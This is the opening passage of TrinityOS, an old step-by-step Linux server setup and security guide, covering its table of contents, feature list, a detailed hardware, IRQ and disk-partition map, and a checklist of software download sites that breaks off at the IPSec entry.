04/15/00 TrinityOS(TM)(c) http://www.ecst.csuchico.edu/~dranch/LINUX/TrinityOS.wri Written, Maintained, Trademarked, and Copyrighted by David A. Ranch (dranch@trinnet.net) +------------------------------------------------------------------------------------+ | ** Best viewed in a GUI WWW browser or MS Wordpad. | | | | Sorry, it will look like CRAP in Lynx ** | | | | ** If you want to PRINT this document, set your printer to LANDSCAPE mode ** | +------------------------------------------------------------------------------------+ | | | --- All of these issues will be resolved once the SGML port is completed --- | | | +------------------------------------------------------------------------------------+ == == == == == == == == == == == == == == == == == == == == == == == == == == Sorry for all the legal stuff... == == == == Yet I've already had one company try to have the name TrinityOS taken from me and == == one HOWTO author has already ripped off MUCH of TrinityOS's content though it was == == re-written to avoid and direct copyright issue. I'm just covering my butt here == == from the many lowlifes in the world. == == == == == == == == == == == == == == == == == == == == == == == == == == Intro: TrinityOS is a complete Linux server configuration, maintinance, and security guide for the Linux novice and guru alike! Though there are a LOT of features covered in TrinityOS, you don't have to implement all of them. All I can say is, if you are going to connect the Linux box to the Internet, at least INSTALL the packet firewall!! This document is tailored as a step-by-step, example driven document instead of a detailed explanation doc on each Linux feature. It doesn't go into much debugging aspects since the Linux Documentation Project's (LDP) HOWTOs already cover this. The TrinityOS document is intended for a techincal audience but hopefully everything is layed out well enough that a new user should be able to follow along without too much trouble! ------------------------------------------------------------------------------ All of TrinityOS's step-by-step instructions, files, and scripts are fully scripted out for an automatic installation at: http://www.ecst.csuchico.edu/~dranch/LINUX/TrinityOS-files/TrinityOS-security.tgz ----------------------------------------------------------------------------- * For the curious, the name TrinityOS and my company, Trinity Designs, is NOT derived from being religious (the holy Trinity). The name "Trinity Designs" came from the Trinity Alps in Northern California and "TrinityOS" came from the name of the first atomic bomb testing site in White Sands, New Mexico. ================================================================================ Like any UNIX document, it must be updated constantly to remain relevant. I will do my best to maintain this document but all comments, ideas, etc is appreciated to keep TrinityOS valuable! ================================================================================ This guide was initially based off the Slackware v3.2 distribution but due to a disk crash, I then installed Redhat 5.0 to try it out. From that point on, I now try to make TrinityOS doc reflect other distros. Note: Most of the initial functionality given in this document is already available in a modern day distribution such as Redhat5, Debian, SuSe, etc. If you are using any other distribution than Redhat, Debian, etc.. you will need to use this doc as a *reference* or a project management guide only. You will then need to obtain the various software sources or binaries by hand and configure the software via its native methods. ** Please note that this document will always be "Under Construction". ** Everything in the "Current Features List" have been implemented and should be documented. Some things in the "Future Features" section have already been completed though not necessarily documented yet. If you have any specific questions about the "Future" or "Current features".. feel free to ask! #### Tangent #### If you have come to this doc directly, you also might want to check out the rest of my WWW page at: http://www.ecst.csuchico.edu/~dranch It covers other topics such as: Who am I (Why did I do all this?) ISDN technologies (T/A & router evalutations, etc) RAS technologies (xDSL, 56K modems, PPP optimizations, etc) PC Hardware (overclocking, chipset & BIOS discussions, etc) Cablemodems (how they work, the system I setup, @Home, etc) Linux (TrinityOS, book reviews, other links, etc) Researching ISPs (How to pick a good ISP) Bookmarks (Check out my extensive WWW bookmarks) ********************************************************************* ** Would you like to be notified when I update my WWW page or ** ** specifically the TrinityOS doc? ** ** ** ** Every "update" e-mail is based from both the ChangeLog WWW page ** ** and the TrinityOS ChangeLog section so you will know what was ** ** exactly updated without any extra fluff. ** ** ** ** If you're interested, send an e-mail to ** ** ** ** mailto:dranch@trinnet.net ** ** ** ** with a subject of "Add me to your updates list" and I'll add ** ** you to the list! ** ** ** ** -PS- In the same request email, tell me what specifically you ** ** were/are looking for on my WWW page or in TrinityOS. ** ** I'm always taking new requests for additions and expanded ** ** coverage of topics already on my page. ** ** ** ** So don't be shy! ** ********************************************************************* ================================================================================= Section 2 - TrinityOS Table of Contents Section 1 - Introduction 2 - TOC: TrinityOS Table of contents (this section) 3 - TrinityOS Feature set 4 - Hardware layout: An example of complete documentation on hardware configuration (I/O and disk maps) 5 - URLs: Software URL download map and checklist 6 - Distros: Thoughts on Picking a Linux Distribution 7 - Initial Steps: Installing a distribution, patching it, and doing a Search/Replace on TrinityOS 8 - Initial Security: Initial System Security [CMOS setups, TCP wrappers, shadow passwds, etc] 9 - Logging: Advanced System Logging and some Cool Tips 10 - Firewalls: How Packet firewlls work; initial configuring of an IP MASQ startup; Configuring STRONG firewall rulesets for both IPFWADM and IPCHAINS for single and multi-NIC setups 11 - MASQ tools: Patching a 2.0.x kernel for Ipportfw, Compiling, and installing 12 - Kernel Compiling: Initial Linux 2.0.x and 2.2.x kernel compiling 13 - PPP: Compile PPPd 14 - Kernel Compiling #2: Final Linux Kernel compiling and installation 15 - Lilo: Lilo configuration and installation 16 - Network: Additional RC script configuration and TCP/IP network optimization 17 - Firewalls #2: Patching, Compiling, and installing IPFWADM for 2.0.x kernels 18 - ROOT MAIL: Mail aliases for system administration 19 - Clean up: Preparing for reboot and clearing the logs 20 - MASQ Modules: Verifing MASQ module installation 21 - Sniffers: Install the TCPDUMP sniffer for tracing traffic (only needed on OLD distros) 22 - PPP: PPPd configuration [For both PRIMARY and BACKUP PPP connections] 23 - Diald: The configuration of Dynamic dial on Demand [For Analog and ISDN modem users only] 24 - DNS: The acquiring, installation, and configuration of both Primary and Secondary servers in a CHROOTed and SPLIT Zone environment 25 - SMTP: Sendmail configuration w/ domain masquerading & spam filters 26 - NTP: Setting up NTP Time calibration 27 - DHCPd: DHCPd SERVER configuration 28 - EMAIL: POP3 and IMAP4 e-mail serivces 29 - BACKUP: Backing up your box (minimum files to floppy and full backup to tape with BRU) 30 - SSH: Securing Terminal, FTP, X-windows, and tunnel encryption with SSH v1/2 31 - RAID: Software RAID 0 : (striping) support 32 - CD Changer: Installation / Setup of a SCSI CD-ROM Changer 33 - Samba: Setup the Microsoft File and Print Services for UNIX 34 - PCMCIA services installation and configuration 35 - DHCPc: Client DHCP for xDSL / Cablemodem users 36 - APCUPSD: Full automation of a APC UPS 37 - WWW: Installation & configuration of the Apache WWW server 38 - File monitors: Installation of the Tripwire file monitor system [Not Complete] 39 - CDR Backup: Backing up the new system Linux to a CD-R [Not Complete] 40 - NFS: Setting up, testing, and securing NFS 41 - EXT2: File system tuning 42 - Dial-in: Terminal & PPP access via a modem 43 - Patch Notifiers: Automated RPM notifier / updater (not complete) 45 - Port Scanners: NMAP portscanning to test your packet firewall 46 - Security Audits: So you think you are being hacked.. Confirm it! 47 - Printing: UNIX and Samba Printing 48 - VPN: IPSec (SWAN) Virtual Private Network (VPN) [Almost complete] 49 - HD Performance: IDE HDs performance optimization via hdparm 50 - SPAM: Dealing with unwanted email and other types of traffic and how to stop it 51 - File System Recovery: How to fix LILO and file system problems 60 - Security: Final Security and up-to-date Linux Security & patching (NEVER ending story. Check back OFTEN!) -- 99 - FAQ: Common observations, Q&A, etc.. 100- Changes: TrinityOS "CRITICALITY" list and ChangeLOG ================================================================================ Section 3 - Feature Sets Current Features: Linux Distribution Thoughts: ---------------------------- + Thoughts and recommendations on picking a Linux distribution + A Search & Replace Key to customize this doc to YOUR environment for easier implementation Core OS setup: ----------------- + Setting up, compiling, installing, booting a 2.2.x / 2.0.x kernel + Lilo configuration and security + Sound Blaster 16 sound support + PCMCIA / CARDBUS PC-Card Services + Software RAID 0 (striping) hard drives + 7-CD SCSI CD-ROM changer system + Stabilizing the Linux EXT2 filesystem + Automated Patching via RPM notifiers + EXT2 file system tuning + IDE HDs performance optimization via hdparm + Dual printer support for both UNIX and Samba hosts Network Connectivity: --------------------- + Full LAN masquerading (NAT or Network Address Translation) using private IP addressing + Masq IP port forwarding support (IPportfw) + Dual 10Mb/s Ethernet network card support setup and TCP/IP Performance optimization (modem and cablemodem users) + PPP connectivity for primary PPP connectivity AND backup PPP connections + Dial-on-Demand (Diald) Internet connections (modem users) - Automatic Internet connections every 15 minutes (modem users) + Direct dial-in terminal / PPP access via a modem + How to setup fully authoritative primary and secondary DNS servers (Bind v8.x) in a CHROOTed and and SPLIT Zone configuration. + How to apply for a full Internet domain name via Network Solutions + Full Sendmail e-mail system support w/ domain masquerading & Anti-SPAM measures with support for more than one Internet domain on one EMAIL server + Full documentation on how understand and FIGHT all that SPAM email + DHCP server for other LAN machines (laptops, etc) + DHCP client setup for TCP/IP addresses + Apache WWW server + Samba : Full Microsoft Windows file & printing support + NFS: Full Sun RPC-based Network File System support + NTP time calibration + Full UNIX (SMB) printing + POP-3 remote email service Security: --------- + Complete physical and OS-level security recommendations and guidelines + Actively Updated Linux system security and patching (Shadow passwords, etc) + Advanced SYSLOG logging and nightly filtered reports emailed to the root user + Advanced packet filter firewall rulesets Complete intro on how packet and Stateful Inspected firewalls work Examples given using either IPFWADM (2.0.x kernels) or IPCHAINS (2.1.x + kernels) + Full SSH telnet support [Future: X-windows encrypted tunnels] + IPSEC (Swan) VPN [Almost Complete] + TrinityOS "CRITICALITY" rating in the CHANGELOG section to gauge the level of urgency of security vulnerabilities, system mis-configurations, etc. + Tripwire Security Breech monitoring [not completed yet] + NMAP portscanning to test your packet firewall + Figuring out if you have been hacked.. Confirm it! + Prioritized ChangeLog to let users know what changes are and are NOT too important + Anonymized Sendmail Banners System backup: -------------- + Minimum backups to floppy + Full tape backup via BRU with emergency restore diskette creation + Full APC SmartUPS powerdown support (APCUPSd) w/ paging support + Backing up the server to a CD-R [not completed yet] Hard Disk Recovery: ------------------- + How to recover from your box being hacked into and how to RE-secure it + How to fix LILO problems and file system corruption Future Features: (Won't be implemented in any particular order) * TrinityOS To-dos: - Move this doc over to SGML format!!!!!! - Add more "Configuration via GUI tools" sections * Network stuff - Add a single interface IPCHAINS rc.firewall for eth0/1/2 and ppp0/1/2 users - Remove LPR and replace it with LPRng - Mail Backup: Setup high cost MX records and ETRN email backup - IPv6: Configure and setup IPv6 and possibly setup a IPv6 tunnel via the 6Bone - Dial Backup: Add automatic analog modem dial backup when the ADSL/Cablemodem goes down - CODA: Replace NFS support with CODA - Implement IMAP4 for a complete email subsystem - Add a CACHING only setup for 8.1.x DNS - Setup a email list server (MajorDomo, Petidomo, dunno yet) - Email sent dynamic IP address exception requests for access through the TCP Wrappers and the IPFWADM rulesets - DHCPc client setup for Cablemodems - 128-bit encrypted Apache SSL WWW server - Move over to xinetd for better DoS protection - WWW Proxy services - WWW banner add filtering * Security Stuff - Replace the Sendlogs script to use either Swatch or LogSentry - Automate the firewall hits logging for trend analysis - Impliment external 10.x.x.x and 172.16-31.x.x packet filtering - Add a WATCHDOG feature to the rc.firewall ruleset so that if you make an error in the firewall ruleset and the ruleset doesn't complete, a backup ruleset will be automatically loaded to restore connectivity. - Install PGP / GPG for secure and/or verified communications to: other users, Internic, binaries/source code verification, etc - SATAN / COPS / ISS security testing * Application stuff - Implement Procmail to do local email filtering - Setup fetchmail to get remote email vs. setting up a remote .forward - Full SVGA X-Windows support w/ the WindowMaker window Manager (Xfree only. Metrox-X sucks) * Administration stuff - Up the logging time on the UPS to 1 second increments and then plot all the stuff with GNU Plot to then be emailed via "Sendlogs" - Rotate the UPS logs - Implement automatic weekly incremental tape backups to the TR4 tape drive. - BZip2 compression w/ tar patches * System Stuff - Iomega parallel ZIP drive support ================================================================================= ================================================================================= Section 4 - Hardware Configuration This document uses methodologies that I have developed over the years. Some of these docs have saved my butt on several occasions (Drive partition maps, I/O and IRQ maps). This may seem like a pain in the butt to do initially but when you need them.. YOU NEED THEM! -- - Distribution: - Redhat 5.0 w/ all available patches - Kernel v2.0.38 Hardware Used: - ASUS GX4 Motherboard / 256k 2nd level cache (2 VLB slots) - AMD 486-160Mhz/40MB RAM NOTE: Though sick.. this machine doesn't have a free IRQ, IDE port, or SCSI ID available. This system is MAXED out! - Network: Eth0: 3Com 3c509 (IRQ 9) - cablemodem interface *Configured for: - No modem - optimization: Server Eth1: 3Com 3C509b (IRQ 12) - Internal LAN interface *Configured for: - No modem - optimization: Server - Video: Orchid ProIIs ET4000 w/1MB RAM (ISA) - Sound: Sound Blaster 16 (IRQ 10; DMA 1,6; Port 220, CD-Port 300) - Controllers: - Generic EIDE Controller (VLB) (IRQ 14,15) - Adaptec 2842b VLB SCSI controller (IRQ 11, DMA 5, port CC00, BIOS D000) - Hard Drives: == In the primary system case == - HDA: Western Digital Caviar 1.0GB (EIDE)[128k][LBA] [Mode 3-able] - HDB: Empty - HDC: Maxtor DiamondMax+ 10.0GB (UDMA)[512k][LBA] [Mode UDMA] - HDD: Seagate Medalist 540MB (EIDE)[124k][LBA] [Mode 3-able] == In the secondary RAID case == - SDA: Seagate ST31200 1.05GB - SDB: Hp (IBM 2GB Ultrastar) - SDC: Conner CP30540 540MB - CD-Roms: - SCD0: Philips Quad - Nakamichi 7-disk CD-ROM changer (external) - Tape Drives: - Hp T4000s TR4 4/8GB SCSI tape drive (in the RAID case) - I/O:(See docs on IRQTUNE to better understand why these are like this. It makes a difference!) ttyS0: USR Courier v.Everything (IRQ 4) ttyS1: Dec Hub console (IRQ 3) ttyS2: APC SmartUPS UPS (IRQ 3) ttyS3: Logitech 3b mouse (IRQ 5) LPT1: Hp LaserJet-IIp (UNIX & Samba share) LPT2: Epson Stylus 500 Color (UNIX & Samba share) BIOS Setup (Specific to the ASUS GX4 Award BIOS) - This is abbrev'ed here for me. Though these settings will mean NOTHING to you but you ---really--- should write down the CMOS settings for your box. Standard: Drive C: 1024GB LBA Drive D: 1224GB LBA Drive E: 2722GB LBA - BIOS does NOT support this 10GB drive for DOS Drive F: 540MB LBA Features: Chipset: - Disabled - ON - Setup Auto-Disabled Auto Sync - Enabled - High - Enabled BUS 1/4 Write-Thru - Enabled - Enabled - Disabled Speed- faster 1 - Enabled - Disabled - Disabled 0 2 - C, A - 6 - Disabled 1T Non - Disabled - 250 Enabled Disabled - Disabled Enabled Enabled Enabled 2uS T2 Installed cards: VLB EIDE Controller w/ I/O [2-16550] IDE0: Enabled IDE1: Enabled Joystick: Disabled Serial1: Enabled COM1/IRQ4 (modem) Serial2: Enabled COM2/IRQ3 (UPS) Parallel: Enabled LPT1/polling (Hp LJ printer) VLB 2842B SCSI controller SCSI: Enabled * Be sure that the SCSI setup, accessed via Floppy: Disabled * upon reboot, has *ALL* devices set Port: CC00 * for 10Mb/s, DISCONNECT, and Send-Spin-UP command BIOS: Enabled BIOS: D000 ISA Multi-I/O Serial1: Enabled COM3/IRQ3 (HUB) Serial2: Enabled COM4/IRQ5 (Mouse) Parallel: Enabled LPT2/IRQ (Epson SC500 printer) Joystick: Disabled SoundBlaster16: Joystick: Enabled ------ I/O Maps and "Expert" fdisk partition tables ----- IRQ Map: 0: timer (system) 1: keyboard(system) 2: Cascade (system) 3: COM2-UPS (VLB controller) & COM3-HUB (ISA controller) 4: COM1-modem (VLB controller) 5: COM4-Mouse (ISA controller) 6: Floppy (system) 7: LPT1-printer 8: Clock (system) 9: Cascade-3c509 (cablemodem) 10: SoundBlaster 16 11: 2842b SCSI 12: 3c509b (internal LAN) 13: Math coprocessor 14: IDE0 15: IDE1 I/O Port MAP: 170-1F7h: IDE1 1F0-1F7h: IDE0 200-207h: (not used) usually Joystick 220-22Fh: SoundBlaster 16 230-233h: SoundBlaster 16 CD-ROM interface 260- ? h: 3c509b (eth1) 278-27Fh: LPT1 2A0-2AFh: 3c509 (eth0) 2E8-2EFh: COM4 2F8-2FFh: COM2 330-331h: SoundBlaster MPU-401 334-337h: Adaptec 2842b 376-376h: IDE1 378-37Fh: LPT1 388-38Bh: SoundBlaster OPL2/3 3E8-3EFh: COM3 3F0-3F5h: Floppy drive 3F6-3F6h: IDE0 CCOOh: AHA2842b port D000h: AHA2842b BIOS port E400h: System BIOS E800h: Systen BIOS F000h: System BIOS DMA Map: 0 - Dunno. 1 - SoundBlaster16 LOW 2 - Alternative Floppy DMA 3 - Floppy DMA 4 - Casecade 5 - AHA 2842b 6 - SoundBlaster 16 HIGH SCSI IDs: ----------------------------------------------------------------- ID 0 SEAGATE Model: ST31200N SUN1.05 Rev: 8564 Type: Direct-Access ANSI SCSI revision: 02 ----------------------------------------------------------------- ID 1 HP Model: 2.13 GB #C Rev: 1111 Type: Direct-Access ANSI SCSI revision: 02 ----------------------------------------------------------------- ID 2 LUN 0-6: NRC Model: MBR-7 Rev: 110 Type: CD-ROM ANSI SCSI revision: 02 ----------------------------------------------------------------- ID 3 Philips Model: CM4xx Rev: 1.01 Type: CD-ROM ANSI SCSI revision: 02 ----------------------------------------------------------------- ID 4 HP Model: T4000s Rev: 1.10 Type: Sequential-Access ANSI SCSI revision: 02 ----------------------------------------------------------------- ID 5 NONE ----------------------------------------------------------------- ID 6 COMPAQPC Model: CP30540 Rev: 90C5 Type: Direct-Access ANSI SCSI revision: 02 ----------------------------------------------------------------- ID 7 Adaptec AHA2842b SCSI controller ----------------------------------------------------------------- ----- All hard Drive partition tables ----- /dev/hda (expert mode printout) ================================================== Disk /dev/hda: 64 heads, 63 sectors, 525 cylinders Nr AF Hd Sec Cyl Hd Sec Cyl Start Size ID 1 80 1 1 0 63 63 25 63 104769 06 2 00 0 1 26 63 63 523 104832 2007936 05 3 00 0 0 0 0 0 0 0 0 00 4 00 0 0 0 0 0 0 0 0 00 5 00 1 1 26 63 63 76 63 205569 82 6 00 1 1 77 63 63 523 63 1802241 83 ================================================== /dev/hdc (normal mode printout - expert truncates) ================================================== Disk /dev/hdc: 16 heads, 63 sectors, 19390 cylinders Units = cylinders of 1008 * 512 bytes Device Boot Begin Start End Blocks Id System /dev/hdc1 1 1 19390 9772528+ 83 Linux native ================================================== /dev/hdd (expert mode printout) ================================================== Disk /dev/hdd: 32 heads, 63 sectors, 528 cylinders Nr AF Hd Sec Cyl Hd Sec Cyl Start Size ID 1 00 1 1 0 31 63 527 63 1064385 83 2 00 0 0 0 0 0 0 0 0 00 3 00 0 0 0 0 0 0 0 0 00 4 00 0 0 0 0 0 0 0 0 00 ================================================== /dev/sda (expert mode printout) ================================================== Disk /dev/sda: 64 heads, 32 sectors, 1006 cylinders Nr AF Hd Sec Cyl Hd Sec Cyl Start Size ID 1 00 1 1 0 63 32 1005 32 2060256 83 2 00 0 0 0 0 0 0 0 0 00 3 00 0 0 0 0 0 0 0 0 00 4 00 0 0 0 0 0 0 0 0 00 ================================================== /dev/sdb (expert mode printout) ================================================== Disk /dev/sdb: 64 heads, 32 sectors, 2033 cylinders Nr AF Hd Sec Cyl Hd Sec Cyl Start Size ID 1 00 1 1 0 63 32 1023 32 4163552 83 2 00 0 0 0 0 0 0 0 0 00 3 00 0 0 0 0 0 0 0 0 00 4 00 0 0 0 0 0 0 0 0 00 ================================================== /dev/sdc (expert mode printout) ================================================== Disk /dev/sdb: 64 heads, 32 sectors, 511 cylinders Nr AF Hd Sec Cyl Hd Sec Cyl Start Size ID 1 00 1 1 0 63 32 510 32 1046496 83 2 00 0 0 0 0 0 0 0 0 00 3 00 0 0 0 0 0 0 0 0 00 4 00 0 0 0 0 0 0 0 0 00 ================================================== ------- Linux HD mount table: /dev/hda6 on / type ext2 (rw) none on /proc type proc (rw) /dev/hda1 on /mnt/dosc type msdos (rw) /dev/hdc1 on /home/hpe type ext2 (rw) /dev/sda1 on /home/hpe/WINDOWS type ext2 (rw) /dev/md0 on /home/hpe/RAID0 type ext2 (rw) /dev/scd0 on /home/hpe/CDROMs/Cdrom0 type iso9660 (ro,norock,uid=501,gid=10,mode=0550) /dev/scd1 on /home/hpe/CDROMs/Cdrom1 type iso9660 (ro,norock,uid=501,gid=10,mode=0550) /dev/scd2 on /home/hpe/CDROMs/Cdrom2 type iso9660 (ro,norock,uid=501,gid=10,mode=0550) /dev/scd3 on /home/hpe/CDROMs/Cdrom3 type iso9660 (ro,norock,uid=501,gid=10,mode=0550) /dev/scd4 on /home/hpe/CDROMs/Cdrom4 type iso9660 (ro,norock,uid=501,gid=10,mode=0550) /dev/scd5 on /home/hpe/CDROMs/Cdrom5 type iso9660 (ro,norock,uid=501,gid=10,mode=0550) /dev/scd6 on /home/hpe/CDROMs/Cdrom6 type iso9660 (ro,norock,uid=501,gid=10,mode=0550) /dev/scd7 on /home/hpe/CDROMs/Cdrom7 type iso9660 (ro,norock,uid=501,gid=10,mode=0550) ================================================================================= Section 5 - Software URL download map and checklist Software recommended and used for the TrinityOS doc (roughtly in this order). ** NOTE** Put all code in /usr/src/archive/ I personally recommend to put ALL additional software source code, RPMs, etc in /usr/src/archive. In the "archive" directory, I make subdirectorys for the various code like dns, ssh, sendmail, etc. This IS your box though so put things ANYWHERE you so wish. :) Done ---- X - Master site for all Internet RFCs: http://www.cis.ohio-state.edu/rfc/ X - The Master IANA site for all Internet port numbers, protocol numbers, etc. A VERY recommended place to goto, download them ALL, and put them in /etc/iana. http://www.isi.edu/in-notes/iana/assignments X - Distribution Sites and Update MIRRORS: Any Service Packs, security patches, etc for your installed Slackware or Redhat distribution(s) Mandrake Updates: Master URL: ftp://ftp.linux-mandrake.com/pub/updates Redhat Updates: Master MIRROR URL: http://www.redhat.com/mirrors.html Often Busy: ftp://updates.redhat.com/pub/redhat/updates/ *** Fast: ftp://ftp.codemeta.com/pub/mirrors/redhat/updates/" 5.2 only: ftp://ftp.infomagic.com/pub/mirrors/linux/RedHatUpdates/ X - Newest stable kernel ftp://ftp.kernel.org or ftp://ftp.freesoftware.com/pub/linux/sunsite/kernel/ 2.0.x ----- 2.0.38 is stable - Any lower version have a DoS attack against the TCP/IP stack 2.2.x ----- 2.2.12 is stable ALL versions less than 2.2.11 have a IP fragmentation bug. This will make ALL strong IPCHAINS rulesets vunerable! I also understand that 2.2.11 has a memory leak issue. Sounds like 2.2.12 is the only version to go with right now. X - The Linux Security HOWTO http://www.linuxdoc.org/HOWTO/Security-HOWTO.html X - Logging tools: CheckLogs: http://www.iae.nl/users/grimaldo/chklogs.shtml Swatch: ftp://ftp.stanford.edu/general/security-tools/swatch Psionic LogCheck: http://www.psionic.com/abaus/logcheck LogSurfer: (like Swatch but with state checking!) http://www.cert.dfn.de/eng/logsurf/home.html X - IP NAT, MASQ, Load Balancing, and High Availability tools - True 1:1 IP NAT (different than IP MASQ). There are several implimentations but here are the common ones: Main Linux NAT, Load Balacing, and High Availability reference site: http://www.linas.org/linux/load.html A newer NAT implimentation: http://proxy.iinchina.net/~wensong/ipnat/ The original Linux NAT implimentation: http://www.csn.tu-chemnitz.de/HyperNews/get/linux-ip-nat.html or http://www.suse.de/~mha/HyperNews/get/linux-ip-nat.html - MASQ E-mail list : By far the BEST way to get MASQ-help (very helpful!!) Send mail to - Linux 2.3.x kernls NetFilter now provides for both 1:Many Masq-like NAT and true 1:1 NAT: http://www.rustcorp.com/linux/index.html X - Linux IP Masq 2.2.x kernels ------------- NOTE: ALL versions less than 2.2.11 have a IP fragmentation bug. This will make ALL strong IPCHAINS rulesets vunerable! Upgrade NOW! - IPCHAINS Main site: http://www.rustcorp.com/linux/ipchains/ - IPMASQADM portforward patches: http://juanjox.kernelnotes.org/ or ftp://ftp.compsoc.net/users/steve/ipportfw/linux21/ - The beginnings of Stateful Inspection for Linux: 2.0.x kernels http://www.ifi.unizh.ch/ikm/SINUS/firewall.html 2.1.x / 2.2.x kernels ftp://ftp.interlinx.bc.ca/pub/spf - ICQ module v0.55 http://members.tripod.com/~djsf/masq-icq/ 2.0.x kernels ------------- - IPFWADM (source must download regardless if installed with Redhat) Slackware: ftp://ftp.xos.nl/pub/linux/ipfwadm/ipfwadm-2.3.0.tar.gz Redhat: ftp://ftp.xos.nl/pub/linux/ipfwadm/ipfwadm-2.3.0-1.src.rpm - IPFWADM patches (if required) at: http://ipmasq.cjb.net/ipfwadm-2.3.0-generic-timeout.patch.gz - IPCHAINS support for the 2.0.3x kernels http://aemiaif.lip6.fr/willy/pub/linux-patches/ipnat/ http://www-miaif.lip6.fr/willy/pub/linux-patches/ - IPPORTFW Port forwarding for 2.0.x kernels Homepage: http://www.ox.compsoc.org.uk/~steve/portforwarding.html Patches: ftp://ftp.ox.compsoc.org.uk/pub/users/steve/ipsubs/sub-patch-1.37.gz - ICQ module v0.52 http://members.tripod.com/~djsf/masq-icq/ - Interpreting Firewall hits: This is a great URL on how to interpret your firewall logs and what all the information means: http://www.robertgraham.com/pubs/firewall-seen.html X - PPP - v2.3.8 (not needed for most cablemodem users) Primary site: ftp://cs.anu.edu.au/pub/software/ppp/ Backup site (has older versions): ftp://ftp.freesoftware.com/pub/linux/sunsite/system/network/serial/ppp/ - ML/PPP Strong implimentation: http://mp.mansol.net.au/mp/ Lots of data, little code: ftp://ftp.east.telecom.kz/pub/src/networking/ppp/multilink Another implimentation (runs on 2.2.x+ and he is looking for testers) http://linux-mp.terz.de Dead link? http://mp.ins-coin.de - PPPoE (PPP over Ethernet) : Needed for some DSL and Cablemodem users http://www.roaringpenguin.com/pppoe.html Some other informational URLs as well: http://www.suse.de/~bk/PPPoE-project.html http://www.sympaticousers.org/faq.htm - PPTP VPNs to Microsoft servers (NOT recommended.. use IPSEC) ftp://ftp.rubyriver.com/pub/jhardin/masquerade/ip_masq_vpn.html To enable PPTP Encryption: http://www.moretonbay.com/PPTP/ X - Diald v0.99.4 (not needed for cablemodem users) Diald is now maintained by a new author and site: http://diald.sourceforge.net RPMS: http://juanjox.kernelnotes.org Download the original Diald and Diald patches (Diald v0.16.5) http://www.loonie.net/~eschenk/diald.html X - NAMED current: 8.2.2p5 Sources: ftp://ftp.isc.org/isc/bind/src/cur/bind-8/ RPMs: As of 4/17/98, The newest bind was only available in the CONTRIB area. It seems to work fine but some people do NOT trust someone else's compiled code, so, its your choice. ftp://rawhide.redhat.com/ You can also find a chroot-ed version of bind here: ftp://ftp.fi.muni.cz/pub/users/kas/bind-chroot/ Announcement list: Send email to bind-announce-request@isc.org with "subscribe" in the suject field. X - Vlock (stock in Redhat if installed) ftp://ftp.freesoftware.com/pub/linux/sunsite/utils/console/vlock-1.0.tar.gz X - Network Sniffers - TCPDUMP (stock in Redhat if installed) - Excellent network packet sniffer ftp://ftp.freesoftware.com/pub/linux/sunsite/system/network/management/ or ftp://ftp.ee.lbl.gov/tcpdump.tar.Z - IPtraf - Excellent high level network protocol watcher - Current 2.1.0 ftp://ftp.cebu.mozcom.com/pub/linux/net - EtherReal - An excellent GUI decoder http://ethereal.zing.org/ X - Sendmail current: v8.9.3 ftp://ftp.sendmail.org/pub/sendmail/ RPMs: The newest Sendmail is NOT available in RPM form from sendmail.org but it IS in Redhat's CONTRIB area. It seems to work fine but some people do NOT trust someone else's compiled code, so, its your choice. ftp://ftp.infomagic.com/pub/mirrors/linux/RedHatContrib/libc6/i386 Announcement list: Send an email to majordomo@Lists.Sendmail.ORG with the text "subscribe sendmail-announce" in the body of the message. - POPAuth http://www.morelr.com/technical/unix/popauth.html For allowing remote POP-3 clients to be able to use the SMTP server to send email. - Virtual Email domains To support multple email domains w/ Sendmail, Qmail, etc check out: http://www.linuxdoc.org/HOWTO/Virtual-Services-HOWTO.html X - DHCP Server RFC Info: http://www.dhcp.org/rfc2131.html http://www.dhcp.org/rfc2132.html Legacy Info: http://www.cis.ohio-state.edu/rfc/rfc1542.txt Download: http://www.isc.org/dhcp.html X - WU-FTP v2.6 FTP: ftp://ftp.wu-ftpd.org/pub/wu-ftpd/ FAQ: http://www.cetis.hvu.nl/~koos/wu-ftpd-faq.html X - DHCP Client DHCP HOWTO: http://metalab.unc.edu/pub/Linux/docs/HOWTO/mini/DHCPcd DHCPcd client: http://www.phystech.com/download/dhcpcd.html Other DHCP info: http://www.linux-firewall-tools.com/linux/firewall/index.html A HOWTO specifc to the RoadRunner Cablemodem setup but its still a good site: http://www.vortech.net/rrlinux/ X - NetWatch ftp://ftp.digital.com/pub/linux/redhat/powertools-5.0/i386/ X - Getdate (NTP) - v1.2 (Was SETTIME) ftp://ftp.freesoftware.com/pub/linux/sunsite/system/network/misc/getdate_rfc868-1.2.tar.gz X - Backing up: (stock in Redhat if installed) - BRU (it's not free but its the best Linux backup software out there. This is one place you just CAN'T skimp!) X - Netscape (stock in Redhat if installed) X - SSH current: ssh-1.2.27 and ssh-2.0.13 http://ftp.ssh.com/pub/ssh/ Additional UNIX SSH tunneling URLs: http://www.ccs.neu.edu/groups/systems/howto/howto-sshtunnel.html X - Raidtools Good info on Linux RAID: http://linas.org/linux/raid.html The drivers: http://luthien.nuclecu.unam.mx/~miguel/raid X - Samba (stock in Redhat if installed) (this version fixes an exploit on bugtract) http://www.samba.org Also.. they have great docs at http://samba.anu.edu.au/ X - PCMCIA Services http://pcmcia.sourceforge.org/ X - APCUPSD UPS server http://www.brisse.dk/site/apcupsd/ X - Apache WWW server Standard Apache: http://www.apache.org or ftp://ftp.redhat.com/pub/contrib/i386/apache-1.2.6-5.i386.rpm SSL-encrypted Apache: http://www.apache-ssl.com/ - File Integrity testing/Monitoring TripWire: --------- Tripwire has gone OpenSource for LINUX! Woohoo! Though it isn't available quite yet, it will be there soon: http://www.tripwire.org Also, as of v2.2.1, Tripwire now runs on Glibc. http://www.tripwiresecurity.com/products/Tripwire_ASR20.cfml You can also get the older versions here: ftp://coast.cs.purdue.edu/pub/COAST/Tripwire Aide: ----- AIDE is a GNU version of Tripwire ftp://ftp.cs.tut.fi/pub/src/gnu/aide-0.4.tar.gz X - RPM update tools: AutoRPM current version: 1.9.8.1 http://www.kaybee.org/~kirk/html/linux.html The Perl module "Libbet" http://cpan.valueclick.com/modules/by-module/Net/ RPM Watch current version: 1.1 (does not work for Redhat 5.2+) [Will be phased out] ftp://ftp.iaehv.nl/pub/users/grimaldo/rpmwatch-1.1-1.noarch.rpm RPMLevel (from the author of RPMWatch) http://coralys.com/products/ X - Mkisofs ftp://tsx-11.mit.edu//pub/linux/packages/mkisofs X - Compression tools BZip2 : http://sourceware.cygnus.com/bzip2/index.html X - Bash HOWTO http://www.linuxdoc.org/HOWTO/Bash-Prompt-HOWTO.html [Section 42] X - Dial-In Server HOWTO http://www.swcp.com/~jgentry - SWAN / IPSEC VPN Project home page: 